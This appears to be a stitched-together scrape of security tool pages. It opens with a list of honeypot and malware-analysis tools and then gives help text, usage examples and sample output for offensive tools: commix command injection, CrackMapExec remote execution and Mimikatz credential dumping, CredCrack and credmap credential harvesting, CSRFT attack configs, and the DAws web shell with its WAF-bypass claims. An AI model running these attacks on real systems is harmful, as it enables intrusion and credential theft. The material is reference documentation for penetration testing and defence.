  • ADHD - Active Defense Harbinger Distribution (ADHD) is a Linux distro based on Ubuntu LTS. It comes with many tools aimed at active defense preinstalled and configured
• Network Analysis Tool
  
  • Tracexploit - replay network packets
• Log anonymizer
  
  • LogAnon - log anonymization library that helps having anonymous logs consistent between logs and network captures
• server
  
  • Honeysink - open source network sinkhole that provides a mechanism for detection and prevention of malicious traffic on a given network
• Botnet traffic detection
  
  • dnsMole - analyse dns traffic, and to potentionaly detect botnet C&C server and infected hosts
• Low interaction honeypot (router back door)
  
  • Honeypot-32764 - Honeypot for router backdoor (TCP 32764)
• honeynet farm traffic redirector
  
  • Honeymole - eploy multiple sensors that redirect traffic to a centralized collection of honeypots
• HTTPS Proxy
  
  • mitmproxy - allows traffic flows to be intercepted, inspected, modified and replayed
• spamtrap
  
  • SendMeSpamIDS.py Simple SMTP fetch all IDS and analyzer
• System instrumentation
  
  • Sysdig - open source, system-level exploration: capture system state and activity from a running Linux instance, then save, filter and analyze
• Honeypot for USB-spreading malware
  
  • Ghost-usb - honeypot for malware that propagates via USB storage devices
• Data Collection
  
  • Kippo2MySQL - extracts some very basic stats from Kippo’s text-based log files (a mess to analyze!) and inserts them in a MySQL database
  • Kippo2ElasticSearch - Python script to transfer data from a Kippo SSH honeypot MySQL database to an ElasticSearch instance (server or cluster)
• Passive network audit framework parser
  
  • pnaf - Passive Network Audit Framework
• VM Introspection
  
  • VIX virtual machine introspection toolkit - VMI toolkit for Xen, called Virtual Introspection for Xen (VIX)
  • vmscope - Monitoring of VM-based High-Interaction Honeypots
  • vmitools - C library with Python bindings that makes it easy to monitor the low-level details of a running virtual machine
• Binary debugger
  
  • Hexgolems - Schem Debugger Frontend - A debugger frontend
  • Hexgolems - Pint Debugger Backend - A debugger backend and LUA wrapper for PIN
• Mobile Analysis Tool
  
  • APKinspector - APKinspector is a powerful GUI tool for analysts to analyze the Android applications
  • Androguard - Reverse engineering, Malware and goodware analysis of Android applications ... and more
• Low interaction honeypot
  
  • Honeypoint - platform of distributed honeypot technologies
  • Honeyperl - Honeypot software based in Perl with plugins developed for many functions like : wingates, telnet, squid, smtp, etc
• Honeynet data fusion
  
  • HFlow2 - data coalesing tool for honeynet/network analysis
• Server
  
  • LaBrea - takes over unused IP addresses, and creates virtual servers that are attractive to worms, hackers, and other denizens of the Internet.
  • Kippo - SSH honeypot
  • KFSensor - Windows based honeypot Intrusion Detection System (IDS)
  • Honeyd Also see more honeyd tools
  • Glastopf - Honeypot which emulates thousands of vulnerabilities to gather data from attacks targeting web applications
  • DNS Honeypot - Simple UDP honeypot scripts
  • Conpot - ow interactive server side Industrial Control Systems honeypot
  • Bifrozt - High interaction honeypot solution for Linux based systems
  • Beeswarm - Honeypot deployment made easy
  • Bait and Switch - redirects all hostile traffic to a honeypot that is partially mirroring your production system
  • Artillery - open-source blue team tool designed to protect Linux and Windows operating systems through multiple methods
  • Amun - vulnerability emulation honeypot
• VM cloaking script
  
  • Antivmdetect - Script to create templates to use with VirtualBox to make vm detection harder
• IDS signature generation
  
  • Honeycomb
• lookup service for AS-numbers and prefixes
  
  • CC2ASN
• Web interface (for Thug)
  
  • Rumal - Thug's Rumāl: a Thug's dress & weapon
• Data Collection / Data Sharing
  
  • HPfriends - data-sharing platform
  • HPFeeds - lightweight authenticated publish-subscribe protocol
• Distributed spam tracking
  
  • Project Honeypot
• Python bindings for libemu
  
  • Pylibemu - A Libemu Cython wrapper
• Controlled-relay spam honeypot
  
  • Shiva - Spam Honeypot with Intelligent Virtual Analyzer
    • Shiva The Spam Honeypot Tips And Tricks For Getting It Up And Running
• Visualization Tool
  
  • Glastopf Analytics
  • Afterglow Cloud
  • Afterglow
• central management tool
  
  • PHARM
• Network connection analyzer
  
  • Impost
• Virtual Machine Cloaking
  
  • VMCloak
• Honeypot deployment
  
  • Modern Honeynet Network
  • SurfIDS
• Automated malware analysis system
  
  • Cuckoo
  • Anubis
  • Hybrid Analysis
• Low interaction
  
  • mwcollectd
• Low interaction honeypot on USB stick
  
  • Honeystick
• Honeypot extensions to Wireshark
  
  • Whireshark Extensions
• Data Analysis Tool
  
  • HpfeedsHoneyGraph
  • Acapulco
• Telephony honeypot
  
  • Zapping Rachel
• Client
  
  • Pwnypot
  • MonkeySpider
  • Capture-HPC-NG
  • Wepawet
  • URLQuery
  • Trigona
  • Thug
  • Shelia
  • PhoneyC
  • Jsunpack-n
  • HoneyC
  • HoneyBOT
  • CWSandbox / GFI Sandbox
  • Capture-HPC-Linux
  • Capture-HPC
  • Andrubis
• Visual analysis for network traffic
  
  • ovizart
• Binary Management and Analysis Framework
  
  • Viper
• Honeypot
  
  • Single-honeypot
  • Honeyd For Windows
  • IMHoneypot
  • Deception Toolkit
• PDF document inspector
  
  • peepdf
• Distribution system
  
  • Thug Distributed Task Queuing
• HoneyClient Management
  
  • HoneyWeb
• Network Analysis
  
  • HoneyProxy
• Hybrid low/high interaction honeypot
  
  • HoneyBrid
• Sebek on Xen
  
  • xebek
• SSH Honeypot
  
  • Kojoney
  • Cowrie
• Glastopf data analysis
  
  • Glastopf Analytics
• Distributed sensor project
  
  • DShield Web Honeypot Project
  • Distributed Web Honeypot Project
• a pcap analyzer
  
  • Honeysnap
• Client Web crawler
  
  • HoneySpider Network
• network traffic redirector
  
  • Honeywall
• Honeypot Distribution with mixed content
  
  • HoneyDrive
• Honeypot sensor
  
  • Dragon Research Group Distro
  • Honeeepi - Honeeepi is a honeypot sensor on Raspberry Pi which based on customized Raspbian OS.
• File carving
  
  • TestDisk & PhotoRec
• File and Network Threat Intelligence
  
  • VirusTotal
• data capture
  
  • Sebek
• SSH proxy
  
  • HonSSH
• Anti-Cheat
  
  • Minecraft honeypot
• behavioral analysis tool for win32
  
  • Capture BAT
• Live CD
  
  • DAVIX
• Spamtrap
  
  • Spampot.py
  • Spamhole
  • spamd
  • Mail::SMTP::Honeypot - perl module that appears to provide the functionality of a standard SMTP server
• Commercial honeynet
  
  • Specter
  • Netbait
• Server (Bluetooth)
  
  • Bluepot
• Dynamic analysis of Android apps
  
  • Droidbox
• Dockerized Low Interaction packaging
  
  • Manuka
  • Dockerized Thug
  • Dockerpot A docker based honeypot.
  • Docker honeynet Several Honeynet tools set up for Docker containers
• Network analysis
  
  • Quechua
• Sebek data visualization
  
  • Sebek Dataviz
• SIP Server
  
  • Artemnesia VoIP
• Botnet C2 monitoring
  
  • botsnoopd
• low interaction
  
  • mysqlpot
• Malware collection
  
  • Honeybow

Honeyd Tools

• Honeyd plugin
  
  • Honeycomb
• Honeyd viewer
  
  • Honeyview
• Honeyd to MySQL connector
  
  • Honeyd2MySQL
• A script to visualize statistics from honeyd
  
  • Honeyd-Viz
• Honeyd UI
  
  • Honeyd configuration GUI - application used to configure the honeyd daemon and generate configuration files
• Honeyd stats
  
  • Honeydsum.pl

Network and Artifact Analysis

• Sandbox
  
  • RFISandbox - a PHP 5.x script sandbox built on top of funcall
  • dorothy2 - A malware/botnet analysis framework written in Ruby
  • COMODO automated sandbox
  • Argos - An emulator for capturing zero-day attacks
• Sandbox-as-a-Service
  
  • malwr.com - free malware analysis service and community
  • detux.org - Multiplatform Linux Sandbox
  • Joebox Cloud - analyzes the behavior of malicious files including PEs, PDFs, DOCs, PPTs, XLSs, APKs, URLs and MachOs on Windows, Android and Mac OS X for suspicious activities

Data Tools

• Front Ends
  
  • Tango - Honeypot Intelligence with Splunk
  • Django-kippo - Django App for kippo SSH Honeypot
  • Wordpot-Frontend - a full featured script to visualize statistics from a Wordpot honeypot -Shockpot-Frontend - a full featured script to visualize statistics from a Shockpot honeypot
• Visualization
  
• HoneyMap - Real-time websocket stream of GPS events on a fancy SVG world map
• HoneyMalt - Maltego tranforms for mapping Honeypot systems

git clone https://github.com/stasinopoulos/commix.git commix

--verbose             Enable the verbose mode.
--install             Install 'commix' to your system.
--version             Show version number and exit.
--update              Check for updates (apply if any) and exit.

--url=URL           Target URL.
--url-reload        Reload target URL after command execution.

URL.

--host=HOST         HTTP Host header.
--referer=REFERER   HTTP Referer header.
--user-agent=AGENT  HTTP User-Agent header.
--cookie=COOKIE     HTTP Cookie header.
--headers=HEADERS   Extra headers (e.g. 'Header1:Value1\nHeader2:Value2').
--proxy=PROXY       Use a HTTP proxy (e.g. '127.0.0.1:8080').
--auth-url=AUTH_..  Login panel URL.
--auth-data=AUTH..  Login parameters and data.
--auth-cred=AUTH..  HTTP Basic Authentication credentials (e.g.
                    'admin:admin').

to provide custom injection payloads.

--data=DATA         POST data to inject (use 'INJECT_HERE' tag).
--suffix=SUFFIX     Injection payload suffix string.
--prefix=PREFIX     Injection payload prefix string.
--technique=TECH    Specify a certain injection technique : 'classic',
                    'eval-based', 'time-based' or 'file-based'.
--maxlen=MAXLEN     The length of the output on time-based technique
                    (Default: 10000 chars).
--delay=DELAY       Set Time-delay for time-based and file-based
                    techniques (Default: 1 sec).
--base64            Use Base64 (enc)/(de)code trick to prevent false-
                    positive results.
--tmp-path=TMP_P..  Set remote absolute path of temporary files directory.
--icmp-exfil=IP_..  Use the ICMP exfiltration technique (e.g.
                    'ip_src=192.168.178.1,ip_dst=192.168.178.3').

python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=INJECT_HERE&submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"

python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=INJECT_HERE" --prefix="//" --suffix="'" 

python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=INJECT_HERE" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"

su -c "python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8""

Features:

•  Multiple options for output (and export using >). xml, json, csv, grepable

•  Check the flags in multiple sites by a file input (one per line). This is very useful for pentesters when they want check the flags in multiple sites.

•  Google search. Search in google all subdomains and check the cookies for each domain.

• Colors for the normal output.

Usage: cookiescanner.py [options] 
Example: ./cookiescanner.py -i ips.txt

Options:
  -h, --help            show this help message and exit
  -i INPUT, --input=INPUT
                        File input with the list of webservers
  -I, --info            More info
  -u URL, --url=URL     URL
  -f FORMAT, --format=FORMAT
                        Output format (json, xml, csv, normal, grepable)
  --nocolor             Disable color (for the normal format output)
  -g GOOGLE, --google=GOOGLE
                        Search in google by domain

requests >= 2.8.1
BeautifulSoup >= 4.2.1

pip3 install --upgrade -r requirements.txt

• Fake filesystem with the ability to add/remove files. A full fake filesystem resembling a Debian 5.0 installation is included
• Possibility of adding fake file contents so the attacker can 'cat' files such as /etc/passwd. Only minimal file contents are included
• Session logs stored in an UML Compatible format for easy replay with original timings
• Cowrie saves files downloaded with wget/curl or uploaded with SFTP and scp for later inspection

• SFTP and SCP support for file upload
• Support for SSH exec commands
• Logging of direct-tcp connection attempts (ssh proxying)
• Logging in JSON format for easy processing in log management solutions
• Many, many additional commands

• An operating system (tested on Debian, CentOS, FreeBSD and Windows 7)
• Python 2.5+
• Twisted 8.0+
• PyCrypto
• pyasn1
• Zope Interface

• dl/ - files downloaded with wget are stored here
• log/cowrie.log - log/debug output
• log/cowrie.json - transaction output in JSON format
• log/tty/ - session logs
• utils/playlog.py - utility to replay session logs
• utils/createfs.py - used to create fs.pickle
• data/fs.pickle - fake filesystem
• honeyfs/ - file contents for the fake filesystem - feel free to copy a real system here

• Pure Python script, no external tools required
• Fully concurrent threading
• Uses ONLY native WinAPI calls for discovering sessions, users, dumping SAM hashes etc...
• Opsec safe (no binaries are uploaded to dump clear-text credentials, inject shellcode etc...)

  ______ .______           ___        ______  __  ___ .___  ___.      ___      .______    _______ ___   ___  _______   ______ 
 /      ||   _  \         /   \      /      ||  |/  / |   \/   |     /   \     |   _  \  |   ____|\  \ /  / |   ____| /      |
|  ,----'|  |_)  |       /  ^  \    |  ,----'|  '  /  |  \  /  |    /  ^  \    |  |_)  | |  |__    \  V  /  |  |__   |  ,----'
|  |     |      /       /  /_\  \   |  |     |    <   |  |\/|  |   /  /_\  \   |   ___/  |   __|    >   <   |   __|  |  |     
|  `----.|  |\  \----. /  _____  \  |  `----.|  .  \  |  |  |  |  /  _____  \  |  |      |  |____  /  .  \  |  |____ |  `----.
 \______|| _| `._____|/__/     \__\  \______||__|\__\ |__|  |__| /__/     \__\ | _|      |_______|/__/ \__\ |_______| \______|

                Swiss army knife for pentesting Windows/Active Directory environments | @byt3bl33d3r

                      Powered by Impacket https://github.com/CoreSecurity/impacket (@agsolino)

                                                  Inspired by:
                           @ShawnDEvans's smbmap https://github.com/ShawnDEvans/smbmap
                           @gojhonny's CredCrack https://github.com/gojhonny/CredCrack
                           @pentestgeek's smbexec https://github.com/pentestgeek/smbexec

positional arguments:
  target                The target range, CIDR identifier or file containing targets

optional arguments:
  -h, --help            show this help message and exit
  -t THREADS            Set how many concurrent threads to use
  -u USERNAME           Username, if omitted null session assumed
  -p PASSWORD           Password
  -H HASH               NTLM hash
  -n NAMESPACE          Namespace name (default //./root/cimv2)
  -d DOMAIN             Domain name
  -s SHARE              Specify a share (default: C$)
  -P {139,445}          SMB port (default: 445)
  -v                    Enable verbose output

Credential Gathering:
  Options for gathering credentials

  --sam                 Dump SAM hashes from target systems
  --mimikatz            Run Invoke-Mimikatz on target systems
  --ntds {ninja,vss,drsuapi}
                        Dump the NTDS.dit from target DCs using the specifed method
                        (drsuapi is the fastest)

Mapping/Enumeration:
  Options for Mapping/Enumerating

  --shares              List shares
  --sessions            Enumerate active sessions
  --users               Enumerate users
  --lusers              Enumerate logged on users
  --wmi QUERY           Issues the specified WMI query

Account Bruteforcing:
  Options for bruteforcing SMB accounts

  --bruteforce USER_FILE PASS_FILE
                        Your wordlists containing Usernames and Passwords
  --exhaust             Don't stop on first valid account found

Spidering:
  Options for spidering shares

  --spider FOLDER       Folder to spider (defaults to share root dir)
  --pattern PATTERN     Pattern to search for in filenames and folders
  --patternfile PATTERNFILE
                        File containing patterns to search for
  --depth DEPTH         Spider recursion depth (default: 1)

Command Execution:
  Options for executing commands

  --execm {atexec,wmi,smbexec}
                        Method to execute the command (default: smbexec)
  -x COMMAND            Execute the specified command
  -X PS_COMMAND         Excute the specified powershell command

Shellcode/EXE/DLL injection:
  Options for injecting Shellcode/EXE/DLL's using PowerShell

  --inject {exe,shellcode,dll}
                        Inject Shellcode, EXE or a DLL
  --path PATH           Path to the Shellcode/EXE/DLL you want to inject on the target systems
  --procid PROCID       Process ID to inject the Shellcode/EXE/DLL into (if omitted, will inject within the running PowerShell process)
  --exeargs EXEARGS     Arguments to pass to the EXE being reflectively loaded (ignored if not injecting an EXE)

Filesystem interaction:
  Options for interacting with filesystems

  --list PATH           List contents of a directory
  --download PATH       Download a file from the remote systems
  --upload SRC DST      Upload a file to the remote systems
  --delete PATH         Delete a remote file

There's been an awakening... have you felt it?

#~ python crackmapexec.py -t 100 172.16.206.0/24
[+] 172.16.206.132:445 is running Windows 6.1 Build 7601 (name:DRUGCOMPANY-PC) (domain:DRUGCOMPANY-PC)
[+] 172.16.206.133:445 is running Windows 6.3 Build 9600 (name:DRUGOUTCOVE-PC) (domain:DRUGOUTCOVE-PC)
[+] 172.16.206.130:445 is running Windows 10.0 Build 10240 (name:DESKTOP-QDVNP6B) (domain:DESKTOP-QDVNP6B)

#~  python crackmapexec.py -t 100 172.16.206.0/24 -u username -p password --shares
[+] 172.16.206.132:445 is running Windows 6.1 Build 7601 (name:DRUGCOMPANY-PC) (domain:DRUGCOMPANY-PC)
[+] 172.16.206.133:445 is running Windows 6.3 Build 9600 (name:DRUGOUTCOVE-PC) (domain:DRUGOUTCOVE-PC)
[+] 172.16.206.130:445 is running Windows 10.0 Build 10240 (name:DESKTOP-QDVNP6B) (domain:DESKTOP-QDVNP6B)
[+] 172.16.206.130:445 DESKTOP-QDVNP6B Available shares:
    SHARE           Permissions
    -----           -----------
    ADMIN$          READ, WRITE
    IPC$            NO ACCESS
    C$              READ, WRITE
[+] 172.16.206.133:445 DRUGOUTCOVE-PC Available shares:
    SHARE           Permissions
    -----           -----------
    Users           READ, WRITE
    ADMIN$          READ, WRITE
    IPC$            NO ACCESS
    C$              READ, WRITE
[+] 172.16.206.132:445 DRUGCOMPANY-PC Available shares:
    SHARE           Permissions
    -----           -----------
    Users           READ, WRITE
    ADMIN$          READ, WRITE
    IPC$            NO ACCESS
    C$              READ, WRITE

#~ python crackmapexec.py -t 100 172.16.206.0/24 -u username -p password -x whoami
[+] 172.16.206.132:445 is running Windows 6.1 Build 7601 (name:DRUGCOMPANY-PC) (domain:DRUGCOMPANY-PC)
[+] 172.16.206.130:445 is running Windows 10.0 Build 10240 (name:DESKTOP-QDVNP6B) (domain:DESKTOP-QDVNP6B)
[+] 172.16.206.132:445 DRUGCOMPANY-PC Executed specified command via SMBEXEC
nt authority\system

[+] 172.16.206.130:445 DESKTOP-QDVNP6B Executed specified command via SMBEXEC
nt authority\system

[+] 172.16.206.133:445 is running Windows 6.3 Build 9600 (name:DRUGOUTCOVE-PC) (domain:DRUGOUTCOVE-PC)
[+] 172.16.206.133:445 DRUGOUTCOVE-PC Executed specified command via SMBEXEC
nt authority\system

#~ python crackmapexec.py -t 100 172.16.206.0/24 -u username -p password --execm wmi -x whoami
[+] 172.16.206.132:445 is running Windows 6.1 Build 7601 (name:DRUGCOMPANY-PC) (domain:DRUGCOMPANY-PC)
[+] 172.16.206.133:445 is running Windows 6.3 Build 9600 (name:DRUGOUTCOVE-PC) (domain:DRUGOUTCOVE-PC)
[+] 172.16.206.130:445 is running Windows 10.0 Build 10240 (name:DESKTOP-QDVNP6B) (domain:DESKTOP-QDVNP6B)
[+] 172.16.206.132:445 DRUGCOMPANY-PC Executed specified command via WMI
drugcompany-pc\administrator

[+] 172.16.206.133:445 DRUGOUTCOVE-PC Executed specified command via WMI
drugoutcove-pc\administrator

[+] 172.16.206.130:445 DESKTOP-QDVNP6B Executed specified command via WMI
desktop-qdvnp6b\drugdealer

#~ python crackmapexec.py -t 100 172.16.206.0/24 -u username -p password --mimikatz
[*] Press CTRL-C at any time to exit
[*] Note: This might take some time on large networks! Go grab a redbull!
[+] 172.16.206.132:445 is running Windows 6.1 Build 7601 (name:DRUGCOMPANY-PC) (domain:DRUGCOMPANY-PC)
[+] 172.16.206.133:445 is running Windows 6.3 Build 9600 (name:DRUGOUTCOVE-PC) (domain:DRUGOUTCOVE-PC)
[+] 172.16.206.130:445 is running Windows 10.0 Build 10240 (name:DESKTOP-QDVNP6B) (domain:DESKTOP-QDVNP6B)
172.16.206.130 - - [19/Aug/2015 18:57:40] "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
172.16.206.133 - - [19/Aug/2015 18:57:40] "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
172.16.206.132 - - [19/Aug/2015 18:57:41] "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
172.16.206.133 - - [19/Aug/2015 18:57:45] "POST / HTTP/1.1" 200 -
[+] 172.16.206.133 Found plain text creds! Domain: drugoutcove-pc Username: drugdealer Password: IloveMETH!@$
[*] 172.16.206.133 Saved POST data to Mimikatz-172.16.206.133-2015-08-19_18:57:45.log
172.16.206.130 - - [19/Aug/2015 18:57:47] "POST / HTTP/1.1" 200 -
[*] 172.16.206.130 Saved POST data to Mimikatz-172.16.206.130-2015-08-19_18:57:47.log
172.16.206.132 - - [19/Aug/2015 18:57:48] "POST / HTTP/1.1" 200 -
[+] 172.16.206.132 Found plain text creds! Domain: drugcompany-PC Username: drugcompany Password: IloveWEED!@#
[+] 172.16.206.132 Found plain text creds! Domain: DRUGCOMPANY-PC Username: drugdealer Password: D0ntDoDrugsKIDS!@#
[*] 172.16.206.132 Saved POST data to Mimikatz-172.16.206.132-2015-08-19_18:57:48.log

#~ python crackmapexec.py -t 150 172.16.206.0/24 -u username -p password --spider Users --depth 10 --pattern password
[+] 172.16.206.132:445 is running Windows 6.1 Build 7601 (name:DRUGCOMPANY-PC) (domain:DRUGCOMPANY-PC)
[+] 172.16.206.133:445 is running Windows 6.3 Build 9600 (name:DRUGOUTCOVE-PC) (domain:DRUGOUTCOVE-PC)
[+] 172.16.206.132:445 DRUGCOMPANY-PC Started spidering
[+] 172.16.206.130:445 is running Windows 10.0 Build 10240 (name:DESKTOP-QDVNP6B) (domain:DESKTOP-QDVNP6B)
[+] 172.16.206.133:445 DRUGOUTCOVE-PC Started spidering
[+] 172.16.206.130:445 DESKTOP-QDVNP6B Started spidering
//172.16.206.132/Users/drugcompany/AppData/Roaming/Microsoft/Windows/Recent/supersecrepasswords.lnk
//172.16.206.132/Users/drugcompany/AppData/Roaming/Microsoft/Windows/Recent/supersecretpasswords.lnk
//172.16.206.132/Users/drugcompany/Desktop/supersecretpasswords.txt
[+] 172.16.206.132:445 DRUGCOMPANY-PC Done spidering (Completed in 7.0349509716)
//172.16.206.133/Users/drugdealerboss/Documents/omgallthepasswords.txt
[+] 172.16.206.133:445 DRUGOUTCOVE-PC Done spidering (Completed in 16.2127850056)
//172.16.206.130/Users/drugdealer/AppData/Roaming/Microsoft/Windows/Recent/superpasswords.txt.lnk
//172.16.206.130/Users/drugdealer/Desktop/superpasswords.txt.txt
[+] 172.16.206.130:445 DESKTOP-QDVNP6B Done spidering (Completed in 38.6000130177)

usage: credcrack.py [-h] -d DOMAIN -u USER [-f FILE] [-r RHOST] [-es]
                    [-l LHOST] [-t THREADS]

CredCrack - A stealthy credential harvester by Jonathan Broche (@g0jhonny)

optional arguments:
  -h, --help            show this help message and exit
  -f FILE, --file FILE  File containing IPs to harvest creds from. One IP per
                        line.
  -r RHOST, --rhost RHOST
                        Remote host IP to harvest creds from.
  -es, --enumshares     Examine share access on the remote IP(s)
  -l LHOST, --lhost LHOST
                        Local host IP to launch scans from.
  -t THREADS, --threads THREADS
                        Number of threads (default: 10)

Required:
  -d DOMAIN, --domain DOMAIN
                        Domain or Workstation
  -u USER, --user USER  Domain username

Examples: 

./credcrack.py -d acme -u bob -f hosts -es
./credcrack.py -d acme -u bob -f hosts -l 192.168.1.102 -t 20

./credcrack.py -r 192.168.1.100 -d acme -u bob --es
Password:
 ---------------------------------------------------------------------
  CredCrack v1.0 by Jonathan Broche (@g0jhonny)
 ---------------------------------------------------------------------

[*] Validating 192.168.1.102
[*] Validating 192.168.1.103
[*] Validating 192.168.1.100

 -----------------------------------------------------------------
 192.168.1.102 - Windows 7 Professional 7601 Service Pack 1 
 -----------------------------------------------------------------

 OPEN      \\192.168.1.102\ADMIN$ 
 OPEN      \\192.168.1.102\C$ 

 -----------------------------------------------------------------
 192.168.1.103 - Windows Vista (TM) Ultimate 6002 Service Pack 2 
 -----------------------------------------------------------------

 OPEN      \\192.168.1.103\ADMIN$ 
 OPEN      \\192.168.1.103\C$ 
 CLOSED    \\192.168.1.103\F$ 

 -----------------------------------------------------------------
 192.168.1.100 - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 
 -----------------------------------------------------------------

 CLOSED    \\192.168.1.100\ADMIN$ 
 CLOSED    \\192.168.1.100\C$ 
 OPEN      \\192.168.1.100\NETLOGON 
 OPEN      \\192.168.1.100\SYSVOL 

[*] Done! Completed in 0.8s

./credcrack.py -f hosts -d acme -u bob -l 192.168.1.100
Password:

 ---------------------------------------------------------------------
  CredCrack v1.0 by Jonathan Broche (@g0jhonny)
 ---------------------------------------------------------------------

[*] Setting up the stage
[*] Validating 192.168.1.102
[*] Validating 192.168.1.103
[*] Querying domain admin group from 192.168.1.102
[*] Harvesting credentials from 192.168.1.102
[*] Harvesting credentials from 192.168.1.103

                  The loot has arrived...
                         __________
                        /\____;;___\    
                       | /         /    
                       `. ())oo() .      
                        |\(%()*^^()^\       
                       %| |-%-------|       
                      % \ | %  ))   |       
                      %  \|%________|       


[*] Host: 192.168.1.102 Domain: ACME User: jsmith Password: Good0ljm1th
[*] Host: 192.168.1.103 Domain: ACME User: daguy Password: P@ssw0rd1!

     1 domain administrators found and highlighted in yellow above!

[*] Cleaning up
[*] Done! Loot may be found under /root/CCloot folder
[*] Completed in 11.3s

Help Menu

Usage: credmap.py --email EMAIL | --user USER | --load LIST [options]

Options:
  -h/--help             show this help message and exit
  -v/--verbose          display extra output information
  -u/--username=USER..  set the username to test with
  -p/--password=PASS..  set the password to test with
  -e/--email=EMAIL      set an email to test with
  -l/--load=LOAD_FILE   load list of credentials in format USER:PASSWORD
  -x/--exclude=EXCLUDE  exclude sites from testing
  -o/--only=ONLY        test only listed sites
  -s/--safe-urls        only test sites that use HTTPS.
  -i/--ignore-proxy     ignore system default HTTP proxy
  --proxy=PROXY         set proxy (e.g. "socks5://192.168.1.2:9050")
  --list                list available sites to test with

Examples

./credmap.py --username janedoe --email janedoe@email.com
./credmap.py -u johndoe -e johndoe@email.com --exclude "github.com, live.com"
./credmap.py -u johndoe -p abc123 -vvv --only "linkedin.com, facebook.com"
./credmap.py -e janedoe@example.com --verbose --proxy "https://127.0.0.1:8080"
./credmap.py --load list.txt
./credmap.py --list

Prerequisites

• Python 2.6+
• Git (Optional)

Running the program

$ python credmap.py -h

Video

• OpenVPN
• SSH private key authentication
• VNC key authentication
• Remote Desktop Protocol (RDP) with NLA support

 # apt-get install openvpn freerdp-x11 vncviewer

 # git clone https://github.com/galkan/crowbar 

$ git clone git@github.com:PaulSec/CSRFT.git

npm install

$ node server.js

Usage : node server.js <file.json> <port : default 8080>

• conf folder : add your JSON configuration file with your configuration.
  
• exploits folder : add all your *.html files containing your forms
• public folder : containing jquery.js and inject.js (script loaded when accessing 0.0.0.0:8080)
• views folder : index file and exploit template
• dicos : Folder containing all your dictionnaries for those attacks
• lib : libs specific for my project (custom ones)
• utils : folder containing utils such as : csrft_utils.py which will launch CSRFT directly.
• server.js file - the HTTP server

{
  "audit": {
    "name": "PoC done with Automatic Tool", 
    "scenario": [
      {
        "attack": [
          {
            "method": "GET", 
            "type_attack": "special_value", 
            "url": "http://www.vulnerable.com/changePassword.php?newPassword=csrfAttacks"
          }
        ]
      }
    ]
  }
}

{
  "audit": {
    "name": "PoC done with Automatic Tool", 
    "scenario": [
      {
        "attack": [
          {
            "file": "./dicos/passwords.txt", 
            "method": "GET", 
            "type_attack": "dico", 
            "url": "http://www.vulnerable.com/changePassword.php?newPassword=<%value%>"
          }
        ]
      }
    ]
  }
}

{
  "audit": {
    "name": "PoC done with Automatic Tool", 
    "scenario": [
      {
        "attack": [
          {
            "form": "/tmp/csrft/form.html", 
            "method": "POST", 
            "type_attack": "special_value"
          }
        ]
      }
    ]
  }
}

{
    "audit": {
        "name": "DeepSec | Login the admin, give privilege to the Hacker and log him out",

        "scenario": [
            {
                "attack": [
                    {
                        "method": "POST",
                        "type_attack": "dico",
                        "file": "passwords.txt",
                        "form": "deepsec_form_log_user.html",
                        "comment": "attempt to connect the admin with a list of selected passwords"
                    }
                ]
            },
            {
                "attack": [
                    {
                        "method": "GET",
                        "type_attack": "special_value",
                        "url": "http://192.168.56.1/vuln-website/index.php/welcome/upgrade/27",
                        "comment": "then, after the login session, we expect the admin to be logged in, attempt to upgrade our account"
                    }
                ]
            },          
            {
                "attack": [
                    {
                        "method": "GET",
                        "type_attack": "special_value",
                        "url": "http://192.168.56.1/vuln-website/index.php/welcome/logout",
                        "comment": "The final step is to logout the admin"
                    }
                ] 
            }   
        ]
    }
}

$ python csrft_utils.py --url="http://www.vulnerable.com/changePassword.php?newPassword=csvulnerableParameter" --param=newPassword --dico_file="../dicos/passwords.txt"

$ python csrft_utils.py --form=http://website.com/user.php --id=changePassword --param=password password=newPassword --special_value

    -h      this menu

    -i      Interactive questions for user password profiling

    -w      Use this option to profile existing dictionary,
            or WyD.pl output to make some pwnsauce :)

    -l      Download huge wordlists from repository

    -a      Parse default usernames and passwords directly from Alecto DB.
            Project Alecto uses purified databases of Phenoelit and CIRT which where merged and enhanced.

    -v      Version of the program

1. Bypasses Disablers; DAws isn't just about using a particular function to get the job done, it uses up to 6 functions if needed, for example, if shell_exec was disabled it would automatically use exec or passthru or system or popen or proc_open instead, same for Downloading a File from a Link, if Curl was disabled then file_get_content is used instead and this Feature is widely used in every section and fucntion of the shell.
2. Automatic Encoding; DAws randomly and automatically encodes most of your GET and POST data using XOR(Randomized key for every session) + Base64(We created our own Base64 encoding functions instead of using the PHP ones to bypass Disablers) which will allow your shell to Bypass pretty much every WAF out there.
3. Advanced File Manager; DAws's File Manager contains everything a File Manager needs and even more but the main Feature is that everything is dynamically printed; the permissions of every File and Folder are checked, now, the functions that can be used will be available based on these permissions, this will save time and make life much easier.
4. Tools: DAws holds bunch of useful tools such as "bpscan" which can identify useable and unblocked ports on the server within few minutes which can later on allow you to go for a bind shell for example.
5. Everything that can't be used at all will be simply removed so Users do not have to waste their time. We're for example mentioning the execution of c++ scripts when there's no c++ compilers on the server(DAws would have checked for multiple compilers in the first place) in this case, the function would be automatically removed and the User would know.
6. Supports Windows and Linux.
7. Openned Source.

• Eval Form:
• `include` is being used instead PHP `eval` to bypass Protection Systems.
• Download from Link - Methods:
• PHP Curl
• File_put_content
• Zip - Methods:
• Linux:
• Zip
• Windows:
• Vbs Script
• Shells and Tools:
• Extra:
• `nohup`, if installed, is automatically used for background processing.

% ./dharma.py -grammars grammars/webcrypto.dg

% ./dharma.py -grammars grammars/canvas2d.dg grammars/mediarecorder.dg

% ./dharma.py -grammars grammars/webcrypto.dg -storage . -count 5

% ./dharma.py -server -grammars grammars/canvas2d.dg -template grammars/var/templates/html5/default.html
% ./framboise.py -setup inbound64-release -debug -worker 4 -testcase ~/dev/projects/fuzzers/dharma/grammars/var/index.html

